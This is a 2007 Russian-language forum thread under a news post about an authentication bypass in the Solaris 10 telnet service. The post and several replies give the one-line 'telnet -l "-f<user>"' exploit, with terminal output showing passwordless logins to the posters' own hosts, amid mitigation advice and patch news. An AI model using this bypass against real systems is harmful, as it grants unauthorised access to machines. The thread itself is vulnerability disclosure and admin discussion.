форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка

Вариант для распечатки		Пред. тема | След. тема
Форумы Разговоры, обсуждение новостей (Public)
Изначальное сообщение		[Проследить за развитием треда]

"OpenNews: Критическая проблема безопасности в telnet сервисе..."

Сообщение от opennews (??) on 13-Фев-07, 14:51

В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций. Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля. Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт. Примечательно, что в 1994 году идентичная проблема была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX. URL: http://blogs.securiteam.com/index.php/archives/814 Новость: https://www.opennet.ru/opennews/art.shtml?num=9842

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Сообщения по теме

[Сортировка по времени, UBB]

1. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от dvg_lab (??) on 13-Фев-07, 14:51

к вопросу о том кто у кого код слямзил :-)

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от lomo on 13-Фев-07, 15:34

Давно так не офигевал от Соляры.. Промышленные, блин, системы... (from linux server to solaris 10 x86 U3 + patches) $ telnet -l"-fjimb" sol10 Trying 10.10.14.3... Connected to sol10. Escape character is '^]'. Last login: Mon Feb 12 12:05:20 from rhel4es-sb Sun Microsystems Inc. SunOS 5.10 Generic January 2005 [jimb@sol10(pts/1) ~]$

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	25. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от alk (??) on 14-Фев-07, 11:10
	что то я не понимаю ... у меня такой номер не прошел [root@main:/] #telnet -l"froot" 10.0.0.2 Trying 10.0.0.2... Connected to 10.0.0.2. Escape character is '^]'. SunOS 5.10 Password:
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	26. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от Аноним on 14-Фев-07, 11:56
	telnet -l "-froot" 10.0.0.2
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	28. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от alk (??) on 14-Фев-07, 14:49
	Мда.... нехило [root@main:/] #telnet -l"falk" 10.0.0.2 Trying 10.0.0.2... Connected to 10.0.0.2. Escape character is '^]'. SunOS 5.10 Sourcing //.profile-EIS..... alk@cnr1 # uname -a SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	31. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от мимоход on 17-Фев-07, 19:36
	что-то у меня работает только на десятке, и то не под рутом, на девятке - нет. >Мда.... нехило >[root@main:/] #telnet -l"falk" 10.0.0.2 >Trying 10.0.0.2... >Connected to 10.0.0.2. >Escape character is '^]'. > >SunOS 5.10 > >Sourcing //.profile-EIS..... >alk@cnr1 # uname -a >SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	30. "Давно так не офигевал от Соляры.."
	Сообщение от Квагга on 14-Фев-07, 22:13
	А Соляра другой, простите, ни одного дня не была. Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба. Отродясь это было визиткой Соляры.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Андрей (??) on 13-Фев-07, 15:57

Нормальные люди отключают телнет ( по крайней мере для доступа из инета и др. небезопасных сетей )

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	5. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от mike_t on 13-Фев-07, 15:59
	telnets тоже не использовать?
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Advanced Аноним on 13-Фев-07, 15:59

я уверен что число машин с включённым telnetd мизерно, так что, хоть сам факт такой глупой ошибки и вызывает непонятные чувства, но никак не подрывает авторитет Solaris...

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	6. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от Advanced Аноним on 13-Фев-07, 15:59
	Кстати, в адвойзари ошибка, под рутом в дефолтной инсталляции нельзя зайти. Только под каким-нибудь другим юзером.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

7. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от ABorland on 13-Фев-07, 16:19

Неужели кто то еще пользуется телнетом?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	8. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от lionGAD on 13-Фев-07, 16:51
	конечно.. например у меня вся безопасность лежит на плечах цысок и внутри сети серверы максимально разгружены и бегают по телнету и rsh к друг другу в гости..
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	9. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от Dmitry (??) on 13-Фев-07, 17:06
	че правда и внутри телнет руту открыт ? ну вы отважный перец :-) хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу все по-нормальному вывели ......
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	11. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от lionGAD on 13-Фев-07, 17:17
	> че правда и внутри телнет руту открыт ? >ну вы отважный перец :-) >хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо >контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу >все по-нормальному вывели ...... у меня в сети дураков нету.. не та сеть, не те задачи... просто я привёл пример что телнет всё таки нужен
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	14. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от Pavel (??) on 13-Фев-07, 17:54
	Дураки есть везде, в том числе и на этом сайте в постах
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	17. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от emp (??) on 13-Фев-07, 19:03
	у нормальных админов все эти телнеты и рсаши бегают в отдельном влане.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

10. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от iptables (??) on 13-Фев-07, 17:12

Ну и ну, телнет действительно не актуален, но проблемма есть. Что касается удалённого входа, то не думаю, что админ оставит открытым телнет для инета, ибо это уже не админ...

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

12. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Хомяк on 13-Фев-07, 17:21

Да Солярку в Сеть вообще лучше не выставлять :-)))

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

13. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от adil_18 (??) on 13-Фев-07, 17:33

да уж

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

15. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Oles on 13-Фев-07, 17:55

Промышленная система ;) SunOS 5.10 Generic_118855-14 i86pc i386 i86pc df -h показывает /dev/md/dsk/d50        825G 16384E   1.2T 2152924666864% /somemount df -k показывает /dev/md/dsk/d50      865477325 18446744073261050460 1305323708 2152924666864% /somemount эх, бардак...

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

16. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от L.Torvalds on 13-Фев-07, 18:44

Ну чего раскудахтались? Ошибки у всех бывают :) Хотя конечно неприято ... По делу надо добавить: - подвержены _только_ Solaris 10. Старые соляры все держат пучком :) - root'ом не зайдешь. Можно только юзером. Утешение слабое, но на безрыбьи ... Самое паскудное - патча нет. Второй день пошел. Для тех кому telnet таки нужен, очень "горячий" второй fu*ng день :-/

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

18. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Аноним on 13-Фев-07, 19:21

а на Sol9 sun не работает это

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

19. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от morph (??) on 13-Фев-07, 20:03

телнет к сожалению остался на еще момедах, коммутаторах и прочей лабуде. Интересно, неужели sshd на сервере хавает ресурсов больше? Вернее...неверно вопрос задал - в масштабе производительности хорошего сервера (даже на x86) будет заметна разница?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	21. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от гость on 13-Фев-07, 21:40
	Если железо не на помойке подобрано, то ничего заметно не будет при условии что количество сессий и объем трафика в них не выражаются 4х значными числами.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

20. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от fi on 13-Фев-07, 21:39

Многие проги под виндоус исторически заточены работать с сервером без ssh.  Конечно, все внутри, но где гарантия , что изнутри нет желающих. Более того, когда у нас админы опечаленные положением дел, без предупреждения закрыли сервисы (telnet и rexec) - народ взвыл! открыли в тот же вечер - переконфигурировать всех клиентов было не реально :))))

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

22. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Аноним on 13-Фев-07, 23:59

Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим telnet, на рутера и сервера - ssh only.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	23. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от ламусанонимус on 14-Фев-07, 00:09
	>Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим >telnet, на рутера и сервера - ssh only. Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

24. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Аноним on 14-Фев-07, 07:51

Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

	29. "Критическая проблема безопасности в telnet сервисе Solaris"
	Сообщение от FSA (??) on 14-Фев-07, 21:45
	Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.
	Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

27. "Критическая проблема безопасности в telnet сервисе Solaris"

Сообщение от Аноним on 14-Фев-07, 12:15

ISR (Interim Security Relief) patches are now available for the Solaris 10 in.telnetd vulnerability from http://sunsolve.sun.com/tpatches The Descriptions and readme links are currently empty, but they should be there shortly. The ISR's are : IDR125456-01.zip  -  Solaris 10 SPARC IDR125457-01.zip  -  Solaris 10 x86 Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of these patches/ISR's require a reboot and they will take effect immediately.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить	Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]